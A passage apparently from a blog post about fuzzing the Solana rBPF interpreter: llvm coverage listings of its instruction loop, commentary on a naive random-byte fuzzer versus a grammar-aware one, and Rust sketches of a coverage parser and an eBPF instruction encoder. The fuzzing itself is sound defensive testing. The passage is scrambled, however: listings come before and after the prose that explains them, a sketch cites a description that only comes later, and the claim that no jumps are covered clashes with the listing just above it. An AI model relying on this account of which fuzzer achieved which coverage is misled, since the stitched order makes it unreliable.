 933|     0|                        64 => reg[dst].to_be(),
 934|      |                        _ => {
 935|     0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 936|      |                        }
 937|      |                    };
 938|      |                },
 939|      |
 940|      |                // BPF_ALU64 class
 941|   402|                ebpf::ADD64_IMM => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
 942|   351|                ebpf::ADD64_REG => reg[dst] = reg[dst].wrapping_add(reg[src]),
 943| 1.12k|                ebpf::SUB64_IMM => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
 944|   721|                ebpf::SUB64_REG => reg[dst] = reg[dst].wrapping_sub(reg[src]),
 945| 3.06k|                ebpf::MUL64_IMM => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
 946| 1.71k|                ebpf::MUL64_REG => reg[dst] = reg[dst].wrapping_mul(reg[src]),
 947| 1.39k|                ebpf::DIV64_IMM => reg[dst] /= insn.imm as u64,
 948|      |                ebpf::DIV64_REG => {
 949|    23|                    if reg[src] == 0 {
 950|    12|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 951|    11|                    }
 952|    11|                    reg[dst] /= reg[src];
 953|      |                },
 954|      |                ebpf::SDIV64_IMM => {
 955| 1.40k|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
                                   ^0
 956|     0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 957| 1.40k|                    }
 958| 1.40k|
 959| 1.40k|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
 960|      |                }
 961|      |                ebpf::SDIV64_REG => {
 962|    12|                    if reg[src] == 0 {
 963|     5|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 964|     7|                    }
 965|     7|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
                                   ^0
 966|     0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 967|     7|                    }
 968|     7|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
 969|      |                },
 970|   838|                ebpf::OR64_IMM => reg[dst] |= insn.imm as u64,
 971| 1.37k|                ebpf::OR64_REG => reg[dst] |= reg[src],
 972| 2.14k|                ebpf::AND64_IMM => reg[dst] &= insn.imm as u64,
 973| 4.47k|                ebpf::AND64_REG => reg[dst] &= reg[src],
 974|     0|                ebpf::LSH64_IMM => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
 975| 1.73k|                ebpf::LSH64_REG => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
 976|     0|                ebpf::RSH64_IMM => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
 977| 1.03k|                ebpf::RSH64_REG => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
 978| 5.59k|                ebpf::NEG64 => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
 979| 2.85k|                ebpf::MOD64_IMM => reg[dst] %= insn.imm as u64,
 980|      |                ebpf::MOD64_REG => {
 981|     3|                    if reg[src] == 0 {
 982|     2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 983|     1|                    }
 984|     1|                    reg[dst] %= reg[src];
 985|      |                },
 986| 2.28k|                ebpf::XOR64_IMM => reg[dst] ^= insn.imm as u64,
 987| 1.41k|                ebpf::XOR64_REG => reg[dst] ^= reg[src],
 988|   383|                ebpf::MOV64_IMM => reg[dst] = insn.imm as u64,
 989| 4.24k|                ebpf::MOV64_REG => reg[dst] = reg[src],
 990|     0|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
 991|   357|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
 992|      |
 993|      |                // BPF_JMP class
 994| 4.43k|                ebpf::JA => { next_pc = (next_pc as isize + insn.off as isize) as usize; },
 995|    10|                ebpf::JEQ_IMM => if reg[dst] == insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
 996| 1.36k|                ebpf::JEQ_REG => if reg[dst] == reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1.36k ^2
 997| 4.16k|                ebpf::JGT_IMM => if reg[dst] > insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1.42k ^2.74k
 998| 1.73k|                ebpf::JGT_REG => if reg[dst] > reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1.39k ^343
 999|   343|                ebpf::JGE_IMM => if reg[dst] >= insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
1000| 2.04k|                ebpf::JGE_REG => if reg[dst] >= reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1.70k ^342
1001| 2.04k|                ebpf::JLT_IMM => if reg[dst] < insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^2.04k ^1
1002|   342|                ebpf::JLT_REG => if reg[dst] < reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
1003| 1.02k|                ebpf::JLE_IMM => if reg[dst] <= insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
1004| 2.38k|                ebpf::JLE_REG => if reg[dst] <= reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^2.38k ^1
1005| 1.76k|                ebpf::JSET_IMM => if reg[dst] & insn.imm as u64 != 0 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1.42k ^347
1006|   686|                ebpf::JSET_REG => if reg[dst] & reg[src] != 0 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
1007| 6.48k|                ebpf::JNE_IMM => if reg[dst] != insn.imm as u64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
1008| 2.44k|                ebpf::JNE_REG => if reg[dst] != reg[src] { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1.40k ^1.03k
1009| 18.1k|                ebpf::JSGT_IMM => if reg[dst] as i64 > insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^17.7k ^363
1010| 2.08k|                ebpf::JSGT_REG => if reg[dst] as i64 > reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^2.07k ^12
1011| 14.3k|                ebpf::JSGE_IMM => if reg[dst] as i64 >= insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^12.9k ^1.37k
1012| 3.45k|                ebpf::JSGE_REG => if reg[dst] as i64 >= reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^3.44k ^12
1013| 1.36k|                ebpf::JSLT_IMM => if (reg[dst] as i64) < insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^1.02k ^346
1014|     2|                ebpf::JSLT_REG => if (reg[dst] as i64) < reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^0
1015| 2.05k|                ebpf::JSLE_IMM => if (reg[dst] as i64) <= insn.imm as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^2.04k ^14
1016| 6.83k|                ebpf::JSLE_REG => if (reg[dst] as i64) <= reg[src] as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                               ^6.83k ^7
1017|      |
1018|      |                ebpf::CALL_REG => {
1019|     0|                    let target_address = reg[insn.imm as usize];
1020|     0|                    reg[ebpf::FRAME_PTR_REG] =
1021|     0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
1022|     0|                    if target_address < self.program_vm_addr {
1023|     0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
1024|     0|                    }
1025|     0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
1026|      |                },
1027|      |
1028|      |                // Do not delegate the check to the verifier, since registered functions can be
1029|      |                // changed after the program has been verified.
1030|      |                ebpf::CALL_IMM => {
1031|    22|                    let mut resolved = false;
1032|    22|                    let (syscalls, calls) = if config.static_syscalls {
1033|    22|                        (insn.src == 0, insn.src != 0)
1034|      |                    } else {
1035|     0|                        (true, true)
1036|      |                    };
1037|      |
1038|    22|                    if syscalls {
1039|     2|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                       ^0
1040|     0|                            resolved = true;
1041|     0|
1042|     0|                            if config.enable_instruction_meter {
1043|     0|                                let _ = instruction_meter.consume(*last_insn_count);
1044|     0|                            }
1045|     0|                            *last_insn_count = 0;
1046|     0|                            let mut result: ProgramResult<E> = Ok(0);
1047|     0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
1048|     0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
1049|     0|                                reg[1],
1050|     0|                                reg[2],
1051|     0|                                reg[3],
1052|     0|                                reg[4],
1053|     0|                                reg[5],
1054|     0|                                &self.memory_mapping,
1055|     0|                                &mut result,
1056|     0|                            );
1057|     0|                            reg[0] = result?;
1058|     0|                            if config.enable_instruction_meter {
1059|     0|                                remaining_insn_count = instruction_meter.get_remaining();
1060|     0|                            }
1061|     2|                        }
1062|    20|                    }
1063|      |
1064|    22|                    if calls {
1065|    20|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                       ^0
1066|     0|                            resolved = true;
1067|      |
1068|      |                            // make BPF to BPF call
1069|     0|                            reg[ebpf::FRAME_PTR_REG] =
1070|     0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
1071|     0|                            next_pc = self.check_pc(pc, target_pc)?;
1072|    20|                        }
1073|     2|                    }
1074|      |
1075|    22|                    if !resolved {
1076|    22|                        if config.disable_unresolved_symbols_at_runtime {
1077|     6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
1078|      |                        } else {
1079|    16|                            self.executable.report_unresolved_symbol(pc)?;
1080|      |                        }
1081|     0|                    }
1082|      |                }
1083|      |
1084|      |                ebpf::EXIT => {
1085|    14|                    match self.stack.pop::<E>() {
1086|     0|                        Ok((saved_reg, frame_ptr, ptr)) => {
1087|     0|                            // Return from BPF to BPF call
1088|     0|                            reg[ebpf::FIRST_SCRATCH_REG
1089|     0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
1090|     0|                                .copy_from_slice(&saved_reg);
1091|     0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
1092|     0|                            next_pc = self.check_pc(pc, ptr)?;
1093|      |                        }
1094|      |                        _ => {
1095|    14|                            return Ok(reg[0]);
1096|      |                        }
1097|      |                    }
1098|      |                }
1099|     0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
1100|      |            }
1101|      |
1102|  135k|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
1103|      |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
1104|   130|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
1105|  135k|            }
1106|      |        }
1107|      |
1108|   419|        Err(EbpfError::ExecutionOverrun(
1109|   419|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
1110|   419|        ))
1111|   763|    }
Unfortunately, this fuzzer doesn’t seem to achieve the coverage we expect.
Several instructions are missed (note the 0 coverage on some branches of the
match) and there are no jumps, calls, or other control-flow-relevant
instructions. This is largely because throwing random bytes at any parser
just isn’t going to be effective; most things will get caught at the
verification stage, and very little will actually test the program.
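Reading a long coverage listing by eye is tedious, so it can help to filter it. The sketch below parses the three-column `line|count|code` layout described earlier and flags rows with a zero hit count. The type and function names are hypothetical, and the handling of the `k` and `M` suffixes is an assumption based on how counts such as `136k` appear in the listing; it is not a parser for every form of llvm coverage output.

```rust
/// One parsed row of `line|count|code` coverage output.
#[derive(Debug, PartialEq)]
struct CoverageRow {
    line: u32,
    /// `None` when the count column is empty (no executable code on the line).
    hits: Option<u64>,
}

/// Parses a count such as `763`, `136k`, or `2.16M` into a rounded integer.
fn parse_count(text: &str) -> Option<u64> {
    let text = text.trim();
    let (digits, scale) = match text.chars().last()? {
        'k' => (&text[..text.len() - 1], 1e3),
        'M' => (&text[..text.len() - 1], 1e6),
        _ => (text, 1.0),
    };
    let value: f64 = digits.parse().ok()?;
    Some((value * scale).round() as u64)
}

/// Parses one row; returns `None` for lines that are not coverage rows,
/// such as the `^0` region markers.
fn parse_row(row: &str) -> Option<CoverageRow> {
    let mut columns = row.splitn(3, '|');
    let line = columns.next()?.trim().parse().ok()?;
    let hits = parse_count(columns.next()?);
    Some(CoverageRow { line, hits })
}

/// A row is uncovered when it has executable code that was never hit.
fn is_uncovered(row: &CoverageRow) -> bool {
    row.hits == Some(0)
}
```

Feeding each line of the listing through `parse_row` and keeping the rows where `is_uncovered` is true gives a quick list of the match arms the fuzzer never reached.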
We must improve this before we continue or we’ll be waiting forever for our
fuzzer to find useful bugs.
At this point, we’re about two hours into development.
The smart fuzzer
eBPF is a quite simple instruction set;
you can read the whole definition
in just a few pages. Knowing this: why don’t we constrain our input to just
these instructions? This approach is commonly called “grammar-aware” fuzzing
on account of the fact that the inputs are constrained to some grammar. It is
very powerful as a concept, and is used to test a variety of large targets
which have strict parsing rules.
To create this grammar-aware fuzzer, I inspected the helpfully-named and
provided insn_builder.rs
which would allow me to create instructions. Now, all I needed to do was
represent all the different instructions. By cross referencing with eBPF
documentation, we can represent each possible operation in a single enum.
You can see the whole grammar.rs in the rBPF repo
if you wish, but the two most relevant sections are provided below.
Defining the enum that represents all instructions
You’ll see here that our generation doesn’t really care to ensure that
instructions are valid, just that they’re in the right format. For example,
we don’t verify registers, addresses, jump targets, etc.; we just slap it
together and see if it works. This is to prevent over-specialisation, where
our attempts to fuzz things only make “boring” inputs that don’t test cases
that would normally be considered invalid.
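As a rough illustration of “right format, unchecked semantics”, the sketch below encodes a handful of instruction shapes into the standard 8-byte eBPF layout (opcode byte, register nibbles, 16-bit offset, 32-bit immediate). The `FuzzInsn` enum, its four variants, and the `assemble` helper are hypothetical and far smaller than the real grammar.rs, which builds instructions through insn_builder.rs rather than by hand.

```rust
/// A few eBPF instruction shapes; a hypothetical subset for illustration.
#[derive(Clone, Copy, Debug)]
enum FuzzInsn {
    Add64Imm { dst: u8, imm: i32 },
    Mov64Imm { dst: u8, imm: i32 },
    Ja { off: i16 },
    Exit,
}

impl FuzzInsn {
    /// Encodes the instruction as 8 bytes: opcode, dst/src nibbles,
    /// little-endian 16-bit offset, little-endian 32-bit immediate.
    fn encode(self) -> [u8; 8] {
        let (opcode, dst, off, imm) = match self {
            FuzzInsn::Add64Imm { dst, imm } => (0x07u8, dst, 0i16, imm),
            FuzzInsn::Mov64Imm { dst, imm } => (0xb7, dst, 0, imm),
            FuzzInsn::Ja { off } => (0x05, 0, off, 0),
            FuzzInsn::Exit => (0x95, 0, 0, 0),
        };
        let mut bytes = [0u8; 8];
        bytes[0] = opcode;
        // Keep the register in its 4-bit field, but do not check that it
        // names a register the VM actually allows; the source nibble is
        // left at zero for these shapes.
        bytes[1] = dst & 0x0f;
        bytes[2..4].copy_from_slice(&off.to_le_bytes());
        bytes[4..8].copy_from_slice(&imm.to_le_bytes());
        bytes
    }
}

/// Concatenates encoded instructions into program text.
/// Jump targets are deliberately not validated.
fn assemble(prog: &[FuzzInsn]) -> Vec<u8> {
    let mut text = Vec::with_capacity(prog.len() * 8);
    for insn in prog {
        text.extend_from_slice(&insn.encode());
    }
    text
}
```

Every output is a well-formed instruction stream, so far less of it is thrown away as malformed bytes, yet `Add64Imm { dst: 15, .. }` or a wild `Ja` offset can still produce programs that the verifier or VM must reject. That is the balance the paragraph above describes.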
Okay – let’s make a fuzzer with this. The only real difference here is that
our input format is now changed to have our new FuzzProgram type instead of
raw bytes:
The whole fuzzer, though really it's not that different
This fuzzer represents a particular stage in development. The differential
fuzzer is significantly different in a few key aspects that will be discussed
later.
If you’re not familiar with llvm coverage output, the first column is the line
number, the second column is the number of times that that particular line was
hit, and the third column is the code itself.
<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
 709|  886|    fn execute_program_interpreted_inner(
 710|  886|        &mut self,
 711|  886|        instruction_meter: &mut I,
 712|  886|        initial_insn_count: u64,
 713|  886|        last_insn_count: &mut u64,
 714|  886|    ) -> ProgramResult<E> {
 715|  886|        // R1 points to beginning of input memory, R10 to the stack of the first frame
 716|  886|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
 717|  886|        reg[1] = ebpf::MM_INPUT_START;
 718|  886|
 719|  886|        // Loop on instructions
 720|  886|        let config = self.executable.get_config();
 721|  886|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                       ^0
 722|  886|        let mut remaining_insn_count = initial_insn_count;
 723|2.16M|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
 724|2.16M|            *last_insn_count += 1;
 725|2.16M|            let pc = next_pc;
 726|2.16M|            next_pc += 1;
 727|2.16M|            let mut instruction_width = 1;
 728|2.16M|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
 729|2.16M|            let dst = insn.dst as usize;
 730|2.16M|            let src = insn.src as usize;
 731|2.16M|
 732|2.16M|            if config.enable_instruction_tracing {
 733|    0|                let mut state = [0u64; 12];
 734|    0|                state[0..11].copy_from_slice(&reg);
 735|    0|                state[11] = pc as u64;
 736|    0|                self.tracer.trace(state);
 737|2.16M|            }
 738|     |
 739|2.16M|            match insn.opc {
 740|2.16M|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
 741|    6|                    match insn.opc {
 742|    2|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
 743|    4|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
 744|     |                        _ => {
 745|     |                            #[cfg(debug_assertions)]
 746|    0|                            unreachable!("unexpected insn on r11")
 747|     |                        }
 748|     |                    }
 749|     |                }
 750|     |
 751|     |                // BPF_LD class
 752|     |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
 753|     |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
 754|     |                ebpf::LD_ABS_B   => {
 755|    5|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 756|    5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                   ^2
 757|    2|                    reg[0] = unsafe { *host_ptr as u64 };
 758|     |                },
 759|     |                ebpf::LD_ABS_H   => {
 760|    3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 761|    3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                   ^1
 762|    1|                    reg[0] = unsafe { *host_ptr as u64 };
 763|     |                },
 764|     |                ebpf::LD_ABS_W   => {
 765|    6|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 766|    6|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                   ^2
 767|    2|                    reg[0] = unsafe { *host_ptr as u64 };
 768|     |                },
 769|     |                ebpf::LD_ABS_DW  => {
 770|    4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
 771|    4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                   ^1
 772|    1|                    reg[0] = unsafe { *host_ptr as u64 };
 773|     |                },
 774|     |                ebpf::LD_IND_B   => {
 775|    9|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 776|    9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                   ^1
 777|    1|                    reg[0] = unsafe { *host_ptr as u64 };
 778|     |                },
 779|     |                ebpf::LD_IND_H   => {
 780|    3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 781|    3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                   ^1
 782|    1|                    reg[0] = unsafe { *host_ptr as u64 };
 783|     |                },
 784|     |                ebpf::LD_IND_W   => {
 785|    4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 786|    4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                   ^2
 787|    2|                    reg[0] = unsafe { *host_ptr as u64 };
 788|     |                },
 789|     |                ebpf::LD_IND_DW  => {
 790|    2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
 791|    2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                   ^0
 792|    0|                    reg[0] = unsafe { *host_ptr as u64 };
 793|     |                },
 794|     |
 795|    6|                ebpf::LD_DW_IMM  => {
 796|    6|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
 797|    6|                    instruction_width = 2;
 798|    6|                    next_pc += 1;
 799|    6|                    reg[dst] = insn.imm as u64;
 800|    6|                },
 801|     |
 802|     |                // BPF_LDX class
 803|     |                ebpf::LD_B_REG   => {
 804|   21|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 805|   21|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                   ^4
 806|    4|                    reg[dst] = unsafe { *host_ptr as u64 };
 807|     |                },
 808|     |                ebpf::LD_H_REG   => {
 809|    4|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 810|    4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                   ^1
 811|    1|                    reg[dst] = unsafe { *host_ptr as u64 };
 812|     |                },
 813|     |                ebpf::LD_W_REG   => {
 814|   26|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 815|   26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                   ^19
 816|   19|                    reg[dst] = unsafe { *host_ptr as u64 };
 817|     |                },
 818|     |                ebpf::LD_DW_REG  => {
 819|    5|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
 820|    5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                   ^1
 821|    1|                    reg[dst] = unsafe { *host_ptr as u64 };
 822|     |                },
 823|     |
 824|     |                // BPF_ST class
 825|     |                ebpf::ST_B_IMM   => {
 826|    8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 827|    8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                   ^1
 828|    1|                    unsafe { *host_ptr = insn.imm as u8 };
 829|     |                },
 830|     |                ebpf::ST_H_IMM   => {
 831|   11|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 832|   11|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                   ^6
 833|    6|                    unsafe { *host_ptr = insn.imm as u16 };
 834|     |                },
 835|     |                ebpf::ST_W_IMM   => {
 836|    9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 837|    9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                   ^6
 838|    6|                    unsafe { *host_ptr = insn.imm as u32 };
 839|     |                },
 840|     |                ebpf::ST_DW_IMM  => {
 841|   16|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 842|   16|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                   ^11
 843|   11|                    unsafe { *host_ptr = insn.imm as u64 };
 844|     |                },
 845|     |
 846|     |                // BPF_STX class
 847|     |                ebpf::ST_B_REG   => {
 848|    9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 849|    9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                   ^2
 850|    2|                    unsafe { *host_ptr = reg[src] as u8 };
 851|     |                },
 852|     |                ebpf::ST_H_REG   => {
 853|    8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 854|    8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                   ^3
 855|    3|                    unsafe { *host_ptr = reg[src] as u16 };
 856|     |                },
 857|     |                ebpf::ST_W_REG   => {
 858|    7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 859|    7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                   ^2
 860|    2|                    unsafe { *host_ptr = reg[src] as u32 };
 861|     |                },
 862|     |                ebpf::ST_DW_REG  => {
 863|    7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
 864|    7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                   ^2
 865|    2|                    unsafe { *host_ptr = reg[src] as u64 };
 866|     |                },
 867|     |
 868|     |                // BPF_ALU class
 869|  136|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32) as u64,
 870|   18|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32) as u64,
 871|   94|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32) as u64,
 872|   14|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32) as u64,
 873|  226|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32) as u64,
 874|   15|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32) as u64,
 875|   98|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32) as u64,
 876|     |                ebpf::DIV32_REG  => {
 877|    4|                    if reg[src] as u32 == 0 {
 878|    2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 879|    2|                    }
 880|    2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
 881|     |                },
 882|     |                ebpf::SDIV32_IMM => {
 883|    0|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
 884|    0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 885|    0|                    }
 886|    0|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
 887|     |                }
 888|     |                ebpf::SDIV32_REG => {
 889|    0|                    if reg[src] as i32 == 0 {
 890|    0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 891|    0|                    }
 892|    0|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
 893|    0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 894|    0|                    }
 895|    0|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
 896|     |                },
 897|  102|                ebpf::OR32_IMM   => reg[dst] = (reg[dst] as u32 | insn.imm as u32) as u64,
 898|   13|                ebpf::OR32_REG   => reg[dst] = (reg[dst] as u32 | reg[src] as u32) as u64,
 899|   46|                ebpf::AND32_IMM  => reg[dst] = (reg[dst] as u32 & insn.imm as u32) as u64,
 900|   16|                ebpf::AND32_REG  => reg[dst] = (reg[dst] as u32 & reg[src] as u32) as u64,
 901|    4|                ebpf::LSH32_IMM  => reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
 902|   32|                ebpf::LSH32_REG  => reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
 903|    2|                ebpf::RSH32_IMM  => reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
 904|    4|                ebpf::RSH32_REG  => reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
 905|   54|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg() as u64; reg[dst] &= u32::MAX as u64; },
 906|   90|                ebpf::MOD32_IMM  => reg[dst] = (reg[dst] as u32 % insn.imm as u32) as u64,
 907|     |                ebpf::MOD32_REG  => {
 908|   20|                    if reg[src] as u32 == 0 {
 909|    6|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 910|   14|                    }
 911|   14|                    reg[dst] = (reg[dst] as u32 % reg[src] as u32) as u64;
 912|     |                },
 913|   96|                ebpf::XOR32_IMM  => reg[dst] = (reg[dst] as u32 ^ insn.imm as u32) as u64,
 914|   14|                ebpf::XOR32_REG  => reg[dst] = (reg[dst] as u32 ^ reg[src] as u32) as u64,
 915|   59|                ebpf::MOV32_IMM  => reg[dst] = insn.imm as u32 as u64,
